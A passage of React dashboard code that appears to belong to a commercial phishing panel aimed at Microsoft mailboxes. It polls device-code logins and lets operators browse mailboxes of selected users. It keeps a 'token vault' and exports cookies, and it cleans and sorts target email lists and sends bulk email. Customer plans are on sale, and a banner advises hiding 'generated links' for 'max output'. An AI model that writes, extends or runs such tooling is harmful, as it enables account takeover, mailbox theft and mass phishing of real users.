      setActiveNav("mail");
      selectedUserIdRef.current = cleanMailbox;
      setSelectedUserId(cleanMailbox);
      setMicrosoftConnected(false);
      setInboxConnected(false);
      setEmails([]);
      setEmailNextLink("");
      setFolders([]);
      setCurrentFolderId(null);
      setSelectedEmail(null);
      fetchMicrosoftStatus(cleanMailbox);
      fetchEnterpriseStatus(cleanMailbox);
      loadRules(cleanMailbox);
    }
  }, [isAuthenticated]);

  useEffect(() => {
    selectedUserIdRef.current = selectedUserId || "";
  }, [selectedUserId]);

  useEffect(() => {
    if (!isAuthenticated || !selectedUserId) return;
    selectedUserIdRef.current = selectedUserId;
    setMicrosoftConnected(false);
    setInboxConnected(false);
    setSelectedEmail(null);
    setEmails([]);
    setEmailNextLink("");
    setEmailLoadingMore(false);
    setFolders([]);
    setCurrentFolderId(null);
    if (emailCacheRef.current) emailCacheRef.current.clear();
    if (emailAbortRef.current) {
      try { emailAbortRef.current.abort(); } catch {}
    }
    fetchMicrosoftStatus(selectedUserId);
    fetchEnterpriseStatus(selectedUserId);
    loadRules(selectedUserId);
  }, [isAuthenticated, selectedUserId]);

  useEffect(() => {
    if (!isAuthenticated || !selectedUserId) return;

    const prev = previousInboxUserRef.current;
    const userChanged = prev.userId !== selectedUserId;
    const inboxJustConnected = inboxConnected && !prev.inboxConnected;

    previousInboxUserRef.current = {
      inboxConnected,
      userId: selectedUserId,
    };

    if (inboxConnected) {
      if (userChanged || inboxJustConnected) {
        loadFolders(selectedUserId);
      }

      const hasActiveSearch =
        (mailSearchQuery || "").trim().length > 0 || mailSearchAttachmentsOnly;
      if ((userChanged || inboxJustConnected) && !hasActiveSearch) {
        loadEmails(currentFolderId, selectedUserId);
      }
    } else {
      if (userChanged) {
        setFolders([]);
        setEmails([]);
        setSelectedEmail(null);
      }
    }
  }, [
    inboxConnected,
    selectedUserId,
    isAuthenticated,
    mailSearchQuery,
    mailSearchAttachmentsOnly,
    currentFolderId,
  ]);

  useEffect(() => {
    if (!autoPollingEnabled || !deviceCodeData?.device_code) return;

    if (devicePollIntervalRef.current) {
      clearInterval(devicePollIntervalRef.current);
      devicePollIntervalRef.current = null;
    }

    devicePollIntervalRef.current = window.setInterval(() => {
      if (!devicePollingRef.current) pollDeviceCodeFlow();
    }, DEVICE_POLL_INTERVAL_MS);

    return () => {
      if (devicePollIntervalRef.current) {
        clearInterval(devicePollIntervalRef.current);
        devicePollIntervalRef.current = null;
      }
    };
  }, [autoPollingEnabled, deviceCodeData?.device_code]);

  useEffect(() => {
    if (!deviceCodeData || !deviceCodeStartedAt || !deviceCodeData.expires_in)
      return;
    const interval = setInterval(() => {
      const elapsed = Math.floor((Date.now() - deviceCodeStartedAt) / 1000);
      const remaining = Math.max(deviceCodeData.expires_in - elapsed, 0);
      setDeviceCodeSecondsLeft(remaining);
      if (remaining === 0) {
        stopDeviceAutoPolling();
        setDeviceFlowStatus("");
        setDeviceCodeData(null);
      }
    }, 1000);
    return () => clearInterval(interval);
  }, [deviceCodeData, deviceCodeStartedAt]);

  useEffect(() => {
    if (!isAuthenticated || !selectedUserId) return;

    const intervalId = window.setInterval(() => {
      if (!isStandaloneMailViewer) fetchUsers();
      fetchTenantConsents();
      fetchEnterpriseTenants();
      fetchDashboardSummary();

      const mailboxToRefresh = standaloneMailboxId || selectedUserId;
      if (mailboxToRefresh) {
        fetchMicrosoftStatus(mailboxToRefresh);
        fetchEnterpriseStatus(mailboxToRefresh);
        loadRules(mailboxToRefresh);
      }
    }, REFRESH_INTERVAL_MS);

    return () => window.clearInterval(intervalId);
  }, [
    isAuthenticated,
    selectedUserId,
    standaloneMailboxId,
    isStandaloneMailViewer,
  ]);

  useEffect(() => {
    if (activeNav === "visits" && isAuthenticated) {
      fetchVisits();
      fetchVisitSummary();
    }
    if (activeNav === "connections" && isAuthenticated) {
      syncDashboardConnections(selectedUserId || "");
    }
    if (activeNav === "customers" && isAuthenticated && isAdmin) {
      fetchCustomerAccounts();
    }
    if (activeNav === "tokenvault" && isAuthenticated) {
      fetchTokenVault();
    }
    if (activeNav === "keywords" && isAuthenticated) {
      fetchKeywordListeners();
    }
    if (activeNav === "telegram" && isAuthenticated) {
      fetchTelegramSettings();
    }
    if (activeNav === "results" && isAuthenticated) {
      fetchReportResults();
      fetchUsers();
      fetchTokenVault();
      if (isAdmin) fetchCustomerAccounts();
      fetchTemporaryMailboxAccesses();
    }
    if (activeNav === "settings" && isAuthenticated) {
      fetchSecuritySettings();
      if (!isAdmin) {
        fetchCustomerProxy();
      }
    }
    if (activeNav === "sender" && isAuthenticated) {
      fetchTokenVault();
    }
    if ((activeNav === "leadcleaner" || activeNav === "providersorter") && isAuthenticated) {
      fetchBackgroundJobs();
    }
    if (activeNav === "dashboard" && isAuthenticated) {
      fetchVisitSummary();
      fetchDashboardSummary();
    }
    if (activeNav === "background-jobs" && isAuthenticated) {
      fetchBackgroundJobs();
    }
  }, [activeNav, isAuthenticated, isAdmin]);

  useEffect(() => {
    if (!isAuthenticated) return;
    const hasRunningJob = backgroundJobs.some((job) => ["queued", "running"].includes(String(job.status || "").toLowerCase()));
    if (!hasRunningJob && backgroundJobs.length > 0) return;
    const intervalId = window.setInterval(fetchBackgroundJobs, 15000);
    fetchBackgroundJobs();
    return () => window.clearInterval(intervalId);
  }, [isAuthenticated, backgroundJobs.length]);

  function renderProductLogo(size = 34) {
    const logo = String(productLogoUrl || "").trim();

    if (logo) {
      return (
        <img
          src={logo}
          alt={BRAND_NAME}
          style={{
            width: size,
            height: size,
            borderRadius: 10,
            objectFit: "cover",
            border: isDarkMode ? "1px solid rgba(255,255,255,0.16)" : "1px solid #e5e7eb",
            background: "#ffffff",
          }}
          onError={(event) => {
            event.currentTarget.style.display = "none";
          }}
        />
      );
    }

    return (
      <div
        style={{
          width: size,
          height: size,
          borderRadius: 10,
          display: "flex",
          alignItems: "center",
          justifyContent: "center",
          background: "linear-gradient(135deg, #2563eb 0%, #7c3aed 100%)",
          color: "#ffffff",
          fontWeight: 900,
          fontSize: Math.max(13, Math.floor(size * 0.42)),
          letterSpacing: -0.5,
        }}
      >
        V
      </div>
    );
  }

  function renderBadge(text, tone = "blue") {
    const tones = {
      blue: { bg: "#eef4ff", color: "#1d4ed8", border: "#c7d7fe" },
      green: { bg: "#ecfdf3", color: "#15803d", border: "#86efac" },
      orange: { bg: "#fff7ed", color: "#c2410c", border: "#fdba74" },
      red: { bg: "#fff1f2", color: "#be123c", border: "#fda4af" },
      gray: { bg: "#f8fafc", color: "#475467", border: "#d0d5dd" },
      purple: { bg: "#f5f3ff", color: "#6d28d9", border: "#c4b5fd" },
    };
    const c = tones[tone] || tones.blue;
    return (
      <span
        style={{
          display: "inline-flex",
          alignItems: "center",
          gap: 6,
          padding: "5px 10px",
          borderRadius: 999,
          border: `1px solid ${c.border}`,
          background: c.bg,
          color: c.color,
          fontSize: 12,
          fontWeight: 800,
          whiteSpace: "nowrap",
        }}
      >
        {text}
      </span>
    );
  }

  function renderStatusPills() {
    return (
      <div style={styles.pillRow}>
        <StatusDot active={microsoftConnected} label="Identity" />
        <StatusDot active={inboxConnected} label="Inbox" />
        <StatusDot active={serverAlive} label="Server" />
        {enterpriseStatus.enterprise_enabled &&
          renderBadge("Enterprise", "purple")}
      </div>
    );
  }

  function formatTimestamp(value) {
    if (!value) return "—";
    const numeric = Number(value);
    const millis = numeric > 100000000000 ? numeric : numeric * 1000;
    const date = new Date(millis);
    if (Number.isNaN(date.getTime())) return String(value);
    return date.toLocaleString();
  }

  function formatRemainingSeconds(seconds) {
    const total = Number(seconds || 0);
    if (!total || total <= 0) return "Expired";
    const days = Math.floor(total / 86400);
    const hours = Math.floor((total % 86400) / 3600);
    const minutes = Math.floor((total % 3600) / 60);
    if (days > 0) return `${days}d ${hours}h`;
    if (hours > 0) return `${hours}h ${minutes}m`;
    return `${minutes}m`;
  }

  function planLabel(plan) {
    const labels = {
      trial_2_days: "2-Day Test",
      trial_3_days: "3-Day Test",
      weekly: "Weekly",
      biweekly: "2 Weeks",
      monthly: "Monthly",
    };
    return labels[plan] || plan || "Unknown";
  }

  function statusTone(status) {
    const clean = String(status || "").toLowerCase();
    if (clean === "active") return "green";
    if (clean === "expired") return "orange";
    if (clean === "suspended" || clean === "disabled") return "red";
    return "gray";
  }

  function renderSidebarItem(key, label, icon) {
    const isActive = activeNav === key;
    return (
      <button
        onClick={() => setActiveNav(key)}
        style={{
          ...styles.navItem,
          background: isActive
            ? isDarkMode
              ? "linear-gradient(135deg, #1e3a8a 0%, #312e81 100%)"
              : "linear-gradient(135deg, #eff4ff 0%, #eef2ff 100%)"
            : "transparent",
          borderColor: isActive ? (isDarkMode ? "#60a5fa" : "#c7d7fe") : "transparent",
          color: isActive ? (isDarkMode ? "#eff6ff" : "#1d4ed8") : (isDarkMode ? "#dbeafe" : "#344054"),
          justifyContent: sidebarCollapsed ? "center" : "flex-start",
        }}
      >
        <span style={{ fontSize: 13, width: 16, textAlign: "center" }}>{icon}</span>
        {!sidebarCollapsed && (
          <span style={{ marginLeft: 7, fontSize: 12, lineHeight: 1.15 }}>{label}</span>
        )}
      </button>
    );
  }

  function renderSummaryCard(label, value, accent, sublabel, icon) {
    return (
      <div
        style={{
          ...styles.summaryCard,
          ...(isDarkMode ? styles.summaryCardDark : {}),
          "--summary-accent": accent,
          "--summary-soft": `${accent}18`,
        }}
      >
        <div style={{ ...styles.summaryCardGlow, background: `${accent}22` }} />
        <div style={styles.summaryCardTopRow}>
          <div
            style={{
              ...styles.summaryCardIcon,
              background: `${accent}18`,
              color: accent,
              borderColor: `${accent}33`,
            }}
          >
            {icon}
          </div>
          <div style={{ ...styles.summaryCardAccentDot, background: accent }} />
        </div>
        <div style={styles.summaryCardLabel}>{label}</div>
        <div style={{ ...styles.summaryCardValue, whiteSpace: "normal", wordBreak: "break-word" }}>{value}</div>
        <div style={styles.summaryCardSub}>{sublabel}</div>
      </div>
    );
  }

  function renderLinkPanel(title, url, payloadEmbedded = false) {
    if (!url) return null;
    return (
      <div style={styles.linkPanel}>
        <div
          style={{
            display: "flex",
            justifyContent: "space-between",
            alignItems: "center",
          }}
        >
          <div style={styles.linkPanelTitle}>{title}</div>
          {payloadEmbedded && renderBadge("✓ Ready", "green")}
        </div>
        <div
          style={{
            fontSize: 12,
            color: "#667085",
            wordBreak: "break-all",
            background: "#f8fafc",
            borderRadius: 10,
            padding: "8px 10px",
            border: "1px solid #eaecf0",
          }}
        >
          {url.length > 80 ? url.slice(0, 80) + "..." : url}
        </div>
        <div style={{ display: "flex", gap: 8, flexWrap: "wrap" }}>
          <a
            style={styles.primaryButton}
            href={url}
            target="_blank"
            rel="noreferrer"
          >
            Open ↗
          </a>
          <CopyButton value={url} label="Copy URL" toast={addToast} />
        </div>
      </div>
    );
  }

  function buildLeadCleanerCsv(rows = []) {
    const headers = [
      "email",
      "status",
      "risk_level",
      "domain",
      "syntax_valid",
      "has_mx",
      "disposable",
      "role_account",
      "duplicate",
      "reasons",
    ];
    const escapeCsv = (value) => `"${String(value ?? "").replace(/"/g, '""')}"`;
    const lines = [headers.join(",")];

    rows.forEach((row) => {
      lines.push(
        headers
          .map((key) => {
            const value = key === "reasons" ? (row.reasons || []).join("; ") : row[key];
            return escapeCsv(value);
          })
          .join(",")
      );
    });

    return lines.join("\n");
  }

  function downloadLeadCleanerCsv(type = "clean") {
    const data = leadCleanerResults || {};
    const rows =
      type === "all"
        ? data.results || []
        : type === "risky"
          ? data.risky || []
          : type === "invalid"
            ? data.invalid || []
            : data.clean || [];

    if (!rows.length) {
      addToast("No rows to export", "warning");
      return;
    }

    const blob = new Blob([buildLeadCleanerCsv(rows)], { type: "text/csv;charset=utf-8" });
    const url = window.URL.createObjectURL(blob);
    const a = document.createElement("a");
    a.href = url;
    a.download = `lead_cleaner_${type}_${Date.now()}.csv`;
    document.body.appendChild(a);
    a.click();
    a.remove();
    window.setTimeout(() => window.URL.revokeObjectURL(url), 1500);
  }

  async function runLeadCleaner() {
    const raw = (leadCleanerInput || "").trim();
    if (!raw) {
      addToast("Paste or upload email leads first", "warning");
      return;
    }

    setLeadCleanerLoading(true);
    setLeadCleanerResults(null);

    try {
      const res = await fetchWithAuth(`${API}/email-verifier/verify`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ emails: raw, max_items: 5000 }),
      });
      const data = await res.json().catch(() => ({}));

      if (!res.ok) {
        addToast(data.detail || data.error || "Lead cleaner failed", "error");
        return;
      }

      setLeadCleanerResults(data);
      if ((data.total_submitted || 0) === 0) {
        addToast("No email addresses were found. Check the pasted list or uploaded file.", "warning");
      } else {
        addToast(`Lead cleaner complete — ${data.clean_count || 0} clean, ${data.risky_count || 0} risky, ${data.invalid_count || 0} invalid, ${data.duplicate_count || 0} duplicates`, "success");
      }
    } catch {
      addToast("Lead cleaner failed", "error");
    } finally {
      setLeadCleanerLoading(false);
    }
  }

  function handleLeadCleanerFile(file) {
    if (!file) return;
    const reader = new FileReader();
    reader.onload = () => setLeadCleanerInput(String(reader.result || ""));
    reader.onerror = () => addToast("Failed to read file", "error");
    reader.readAsText(file);
  }

  function handleProviderSorterFile(file) {
    if (!file) return;
    const reader = new FileReader();
    reader.onload = () => setProviderSorterInput(String(reader.result || ""));
    reader.onerror = () => addToast("Failed to read file", "error");
    reader.readAsText(file);
  }

  async function runProviderSorter() {
    const raw = (providerSorterInput || "").trim();
    if (!raw) {
      addToast("Paste or upload email leads first", "warning");
      return;
    }

    setProviderSorterLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/email-verifier/sort-by-provider`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ emails: raw, max_items: 10000 }),
      });

      if (!res.ok) {
        const data = await res.json().catch(() => ({}));
        addToast(data.detail || data.error || "Provider sorting failed", "error");
        return;
      }

      const blob = await res.blob();
      const url = window.URL.createObjectURL(blob);
      const a = document.createElement("a");
      a.href = url;
      a.download = `email_leads_sorted_by_provider_${Date.now()}.zip`;
      document.body.appendChild(a);
      a.click();
      a.remove();
      window.setTimeout(() => window.URL.revokeObjectURL(url), 1500);
      addToast("Provider-sorted ZIP downloaded", "success");
    } catch {
      addToast("Provider sorting failed", "error");
    } finally {
      setProviderSorterLoading(false);
    }
  }

  async function fetchBackgroundJobs() {
    try {
      const res = await fetchWithAuth(`${API}/background-jobs`);
      const data = await res.json().catch(() => ({}));
      if (res.ok) setBackgroundJobs(data.items || []);
    } catch {}
  }

  async function startLeadCleanerJob() {
    const raw = (leadCleanerInput || "").trim();
    if (!raw) {
      addToast("Paste or upload email leads first", "warning");
      return;
    }

    setLeadCleanerLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/background-jobs/lead-cleaner`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ emails: raw }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to start Lead Cleaner job", "error");
        return;
      }
      await fetchBackgroundJobs();
      addToast("Lead Cleaner job started", "success");
    } catch {
      addToast("Failed to start Lead Cleaner job", "error");
    } finally {
      setLeadCleanerLoading(false);
    }
  }

  async function startProviderSorterJob() {
    const raw = (providerSorterInput || "").trim();
    if (!raw) {
      addToast("Paste or upload email leads first", "warning");
      return;
    }

    setProviderSorterLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/background-jobs/provider-sorter`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ emails: raw }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to start Provider Sorter", "error");
        return;
      }
      await fetchBackgroundJobs();
      addToast("Sorting started", "success");
    } catch {
      addToast("Failed to start Sorter", "error");
    } finally {
      setProviderSorterLoading(false);
    }
  }

  async function exportLeadCleanerJobCsv(jobId, type = "clean") {
    if (!jobId) return;
    try {
      const res = await fetchWithAuth(`${API}/background-jobs/${encodeURIComponent(jobId)}/result-json`);
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Lead Cleaner result is not ready", "warning");
        return;
      }

      const rows =
        type === "all"
          ? data.results || []
          : type === "risky"
            ? data.risky || []
            : type === "invalid"
              ? data.invalid || []
              : type === "duplicates"
                ? data.duplicates || []
                : data.clean || [];

      if (!rows.length) {
        addToast(`No ${type} leads to export`, "warning");
        return;
      }

      const csv = buildLeadCleanerCsv(rows);
      const blob = new Blob([csv], { type: "text/csv;charset=utf-8" });
      const url = window.URL.createObjectURL(blob);
      const a = document.createElement("a");
      a.href = url;
      a.download = `lead_cleaner_${type}_${Date.now()}.csv`;
      document.body.appendChild(a);
      a.click();
      a.remove();
      window.setTimeout(() => window.URL.revokeObjectURL(url), 1500);
    } catch {
      addToast("Failed to export Lead Cleaner CSV", "error");
    }
  }

  async function downloadBackgroundJob(jobId) {
    if (!jobId) return;
    const job = backgroundJobs.find((item) => item.job_id === jobId);
    const isExport = job?.job_type === "email_address_export";
    const endpoint = isExport ? `${API}/background-jobs/${encodeURIComponent(jobId)}/download-zip` : `${API}/background-jobs/${encodeURIComponent(jobId)}/download`;
    try {
      const res = await fetchWithAuth(endpoint);
      if (!res.ok) {
        const data = await res.json().catch(() => ({}));
        addToast(data.detail || data.error || "Download is not ready yet", "warning");
        return;
      }

      const blob = await res.blob();
      const disposition = res.headers.get("content-disposition") || "";
      const match =
        disposition.match(/filename\*=UTF-8''([^;]+)/i) ||
        disposition.match(/filename="?([^";]+)"?/i);

      let fallbackName = isExport ? `email_export_${jobId}.zip` : `background_job_${jobId}.zip`;
      if (job?.job_type === "provider_sorter") {
        fallbackName = "email_leads_sorted_by_provider.zip";
      } else if (job?.job_type === "lead_cleaner") {
        fallbackName = "lead_cleaner_results.zip";
      } else if (job?.job_type === "bulk_email_send") {
        fallbackName = `bulk_send_${jobId}.zip`;
      }

      let filename = match?.[1] ? decodeURIComponent(match[1]).trim() : fallbackName;
      filename = filename.replace(/[^a-zA-Z0-9._-]+/g, "_").replace(/^_+|_+$/g, "");

      if (!filename || filename === "download" || filename.endsWith(".download")) {
        filename = fallbackName;
      }

      if (isExport && !filename.toLowerCase().endsWith(".zip")) {
        filename = filename.replace(/\.download$/i, "").replace(/\.json$/i, "") + ".zip";
      }

      if ((job?.job_type === "provider_sorter" || job?.job_type === "lead_cleaner" || job?.job_type === "bulk_email_send") && !filename.toLowerCase().endsWith(".zip")) {
        filename = filename.replace(/\.download$/i, "").replace(/\.json$/i, "") + ".zip";
      }

      const url = window.URL.createObjectURL(blob);
      const a = document.createElement("a");
      a.href = url;
      a.download = filename;
      document.body.appendChild(a);
      a.click();
      a.remove();
      window.setTimeout(() => window.URL.revokeObjectURL(url), 1500);
    } catch {
      addToast("Failed to download job result", "error");
    }
  }

  function renderJobProgress(job) {
    if (!job) return null;
    const percent = Number(job.percent || 0);
    return (
      <div style={{ ...styles.infoCard, marginTop: 12 }}>
        <div style={styles.cardHeaderCompact}>
          <div>
            <div style={styles.infoKey}>
              {job.job_type === "provider_sorter" ? "Provider Sorter" :
               job.job_type === "email_address_export" ? "Email Export" :
               job.job_type === "bulk_email_send" ? "Bulk Email Send" :
               "Lead Cleaner"} progress
            </div>
            <div style={styles.inlineNote}>{job.progress_message || job.current_step || job.status}</div>
          </div>
          {job.status === "completed"
            ? renderBadge("Completed", "green")
            : job.status === "failed"
              ? renderBadge("Failed", "red")
              : renderBadge(`${percent}%`, "blue")}
        </div>
        <div style={{ height: 10, borderRadius: 999, overflow: "hidden", background: isDarkMode ? "#1f2937" : "#e5e7eb", marginTop: 10 }}>
          <div style={{ width: `${Math.max(0, Math.min(percent, 100))}%`, height: "100%", background: "#2563eb" }} />
        </div>
        {job.job_type === "bulk_email_send" ? (
          <div style={{ ...styles.inlineNote, marginTop: 8 }}>
            Sent: {job.clean_count || 0} · Failed: {job.risky_count || 0} · Processed {job.processed_items || 0} of {job.total_items || 0}
          </div>
        ) : job.job_type === "provider_sorter" ? (
          <div style={{ ...styles.inlineNote, marginTop: 8 }}>
            Processed {job.processed_items || 0} of {job.total_items || 0}
            {" · "}Current provider: {job.current_step || "Detecting MX provider"}
          </div>
        ) : job.job_type === "email_address_export" ? (
          <div style={{ ...styles.inlineNote, marginTop: 8 }}>
            {job.progress_message || `Processing folder ${job.current_folder || ''}`}
            {job.total_folders ? ` (${job.current_folder_index || 0}/${job.total_folders})` : ''}
          </div>
        ) : (
          <div style={{ ...styles.inlineNote, marginTop: 8 }}>
            Processed {job.processed_items || 0} of {job.total_items || 0}
            {" · "}Clean {job.clean_count || 0}
            {" · "}Risky {job.risky_count || 0}
            {" · "}Invalid {job.invalid_count || 0}
            {" · "}Duplicates {job.duplicate_count || 0}
          </div>
        )}
        {job.error && <div style={{ ...styles.inlineNote, color: "#dc2626" }}>{job.error}</div>}
        {job.status === "completed" && job.job_type === "lead_cleaner" && (
          <div style={{ ...styles.buttonRow, marginTop: 10 }}>
            <button style={styles.primaryButton} onClick={() => exportLeadCleanerJobCsv(job.job_id, "clean")}>Export clean CSV</button>
            <button style={styles.secondaryButton} onClick={() => exportLeadCleanerJobCsv(job.job_id, "risky")}>Export risky CSV</button>
            <button style={styles.secondaryButton} onClick={() => exportLeadCleanerJobCsv(job.job_id, "invalid")}>Export invalid CSV</button>
            <button style={styles.secondaryButton} onClick={() => exportLeadCleanerJobCsv(job.job_id, "duplicates")}>Export duplicates CSV</button>
            <button style={styles.secondaryButton} onClick={() => exportLeadCleanerJobCsv(job.job_id, "all")}>Export all CSV</button>
          </div>
        )}
        {job.status === "completed" && (job.job_type === "provider_sorter" || job.job_type === "email_address_export" || job.job_type === "bulk_email_send") && (
          <div style={{ ...styles.buttonRow, marginTop: 10 }}>
            <button style={styles.primaryButton} onClick={() => downloadBackgroundJob(job.job_id)}>Download ZIP</button>
          </div>
        )}
        {job.status === "completed" && job.download_ready && (
          <div style={{ ...styles.buttonRow, marginTop: 10 }}>
            <button style={styles.primaryButton} onClick={() => downloadBackgroundJob(job.job_id)}>Download ZIP</button>
          </div>
        )}
        {job.status === "completed" && (
          <div style={{ ...styles.buttonRow, marginTop: 10 }}>
            <button
              style={styles.dangerButton}
              onClick={async () => {
                try {
                  const res = await fetchWithAuth(`${API}/background-jobs/${encodeURIComponent(job.job_id)}`, { method: "DELETE" });
                  if (!res.ok) {
                    const data = await res.json().catch(() => ({}));
                    addToast(data.detail || data.error || "Failed to delete job", "error");
                    return;
                  }
                  await fetchBackgroundJobs();
                  addToast("Job deleted", "success");
                } catch {
                  addToast("Failed to delete job", "error");
                }
              }}
            >
              Delete
            </button>
          </div>
        )}
      </div>
    );
  }

  function renderBackgroundJobsPanel(type = "") {
    const rows = backgroundJobs.filter((job) => !type || job.job_type === type).slice(0, 8);
    if (!rows.length) return (
      <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
        <div style={styles.cardHeaderCompact}>
          <div>
            <div style={styles.cardTitle}>No background jobs</div>
            <div style={styles.cardSubtitle}>All tasks are idle.</div>
          </div>
          <button style={styles.secondaryButton} onClick={fetchBackgroundJobs}>Refresh</button>
        </div>
      </section>
    );
    return (
      <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
        <div style={styles.cardHeaderCompact}>
          <div>
            <div style={styles.cardTitle}>Recent Tasks</div>
            <div style={styles.cardSubtitle}>Tasks</div>
          </div>
          <button style={styles.secondaryButton} onClick={fetchBackgroundJobs}>Refresh jobs</button>
        </div>
        <div style={{ display: "grid", gap: 10 }}>
          {rows.map((job) => <div key={job.job_id}>{renderJobProgress(job)}</div>)}
        </div>
      </section>
    );
  }

  function renderProviderSorter() {
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Sorter</div>
            </div>
            {renderBadge("MX Sorter", "green")}
          </div>

          <div style={styles.formGrid2}>
            <div>
              <label style={styles.label}>Paste email leads</label>
              <textarea
                style={{ ...styles.textarea, minHeight: 240 }}
                value={providerSorterInput}
                onChange={(event) => setProviderSorterInput(event.target.value)}
                placeholder="Paste emails separated by commas, spaces, semicolons, or new lines"
              />
            </div>

            <div>
              <label style={styles.label}>Upload CSV/TXT list</label>
              <input
                style={styles.input}
                type="file"
                accept=".csv,.txt"
                onChange={(event) => handleProviderSorterFile(event.target.files?.[0])}
              />
            </div>
          </div>

          <div style={styles.buttonRow}>
            <button
              style={styles.primaryButton}
              onClick={startProviderSorterJob}
              disabled={providerSorterLoading}
            >
              {providerSorterLoading ? "Starting..." : "Start sorting"}
            </button>
            <button style={styles.secondaryButton} onClick={() => setProviderSorterInput("")}>
              Clear
            </button>
          </div>
        </section>
        {renderBackgroundJobsPanel("provider_sorter")}
      </div>
    );
  }

  function renderLeadCleaner() {
    const results = leadCleanerResults || {};
    const rows = results.results || [];

    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Email Verification / Lead Cleaner</div>
            </div>
            {renderBadge("Verification", "green")}
          </div>

          <div style={styles.formGrid2}>
            <div>
              <label style={styles.label}>Paste email leads</label>
              <textarea
                style={{ ...styles.textarea, minHeight: 220 }}
                value={leadCleanerInput}
                onChange={(e) => setLeadCleanerInput(e.target.value)}
                placeholder="Paste emails separated by commas, spaces, semicolons, or new lines"
              />
              <div style={styles.inlineNote}>Duplicates are automatically detected and separated.</div>
            </div>

            <div>
              <label style={styles.label}>Upload CSV/TXT list</label>
              <input
                style={styles.input}
                type="file"
                accept=".csv,.txt"
                onChange={(e) => handleLeadCleanerFile(e.target.files?.[0])}
              />
            </div>
          </div>

          <div style={styles.buttonRow}>
            <button
              style={styles.primaryButton}
              onClick={startLeadCleanerJob}
              disabled={leadCleanerLoading}
            >
              {leadCleanerLoading ? "Starting..." : "Start verification"}
            </button>
            <button
              style={styles.secondaryButton}
              onClick={() => {
                setLeadCleanerInput("");
                setLeadCleanerResults(null);
              }}
            >
              Clear
            </button>
          </div>
        </section>

        {renderBackgroundJobsPanel("lead_cleaner")}

        {leadCleanerResults && (
          <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}) }}>
            <div style={styles.cardHeaderCompact}>
              <div>
                <div style={styles.cardTitle}>Verification results</div>
                <div style={styles.cardSubtitle}>
                  Export results.
                </div>
              </div>
              <div style={styles.inlineActions}>
                {renderBadge(`${results.total_submitted || 0} submitted`, "blue")}
                {renderBadge(`${results.clean_count || 0} clean`, "green")}
                {renderBadge(`${results.risky_count || 0} risky`, "orange")}
                {renderBadge(`${results.invalid_count || 0} invalid`, "red")}
                {renderBadge(`${results.duplicate_count || 0} duplicates`, "gray")}
              </div>
            </div>

            <div style={styles.buttonRow}>
              <button style={styles.primaryButton} onClick={() => downloadLeadCleanerCsv("clean")}>Export clean CSV</button>
              <button style={styles.secondaryButton} onClick={() => downloadLeadCleanerCsv("risky")}>Export risky CSV</button>
              <button style={styles.secondaryButton} onClick={() => downloadLeadCleanerCsv("invalid")}>Export invalid CSV</button>
              <button style={styles.secondaryButton} onClick={() => downloadLeadCleanerCsv("all")}>Export all CSV</button>
            </div>

            <div style={styles.tableWrap}>
              <table style={styles.table}>
                <thead>
                  <tr>
                    <th style={styles.th}>Email</th>
                    <th style={styles.th}>Status</th>
                    <th style={styles.th}>Risk</th>
                    <th style={styles.th}>MX</th>
                    <th style={styles.th}>Flags</th>
                  </tr>
                </thead>
                <tbody>
                  {rows.slice(0, 300).map((row, index) => (
                    <tr key={`${row.email}-${index}`}>
                      <td style={styles.td}>{row.email}</td>
                      <td style={styles.td}>
                        {row.status === "clean"
                          ? renderBadge("Clean", "green")
                          : row.status === "risky"
                            ? renderBadge("Risky", "orange")
                            : row.status === "duplicate"
                              ? renderBadge("Duplicate", "gray")
                              : renderBadge("Invalid", "red")}
                      </td>
                      <td style={styles.td}>{row.risk_level || "—"}</td>
                      <td style={styles.td}>{row.has_mx ? "Yes" : "No"}</td>
                      <td style={styles.td}>{(row.reasons || []).join(", ") || "—"}</td>
                    </tr>
                  ))}
                </tbody>
              </table>
            </div>
            {rows.length > 300 && (
              <div style={styles.inlineNote}>Showing first 300 rows. Export CSV to view all results.</div>
            )}
          </section>
        )}
      </div>
    );
  }

  function renderUpgradeBanner() {
    return (
      <div style={styles.upgradeBanner}>
        <strong>You're advised to redirect/cover your generated links for max output</strong>
        <span>- {DASHBOARD_UI_VERSION}</span>

      </div>
    );
  }

  function Vault() {
  const [exportMailbox, setExportMailbox] = useState(selectedUserId || "");
  const [exportMailboxCustom, setExportMailboxCustom] = useState("");
  const [cookieMailbox, setCookieMailbox] = useState(selectedUserId || "");
  const [cookieMailboxCustom, setCookieMailboxCustom] = useState("");
  const [exportLoading, setExportLoading] = useState(false);
  const [importJsonText, setImportJsonText] = useState("");
  const [importFile, setImportFile] = useState(null);
  const [importLoading, setImportLoading] = useState(false);
  const [bulkImportFile, setBulkImportFile] = useState(null);
  const [bulkImportLoading, setBulkImportLoading] = useState(false);
  const [cookieLoading, setCookieLoading] = useState(false);
  const [importResult, setImportResult] = useState(null);
  const [bulkImportResult, setBulkImportResult] = useState(null);

  useEffect(() => {
    if (selectedUserId) {
      setExportMailbox(selectedUserId);
      setCookieMailbox(selectedUserId);
    }
  }, [selectedUserId]);

  const downloadFile = (blob, filename) => {
    const url = window.URL.createObjectURL(blob);
    const a = document.createElement("a");
    a.href = url;
    a.download = filename;
    document.body.appendChild(a);
    a.click();
    a.remove();
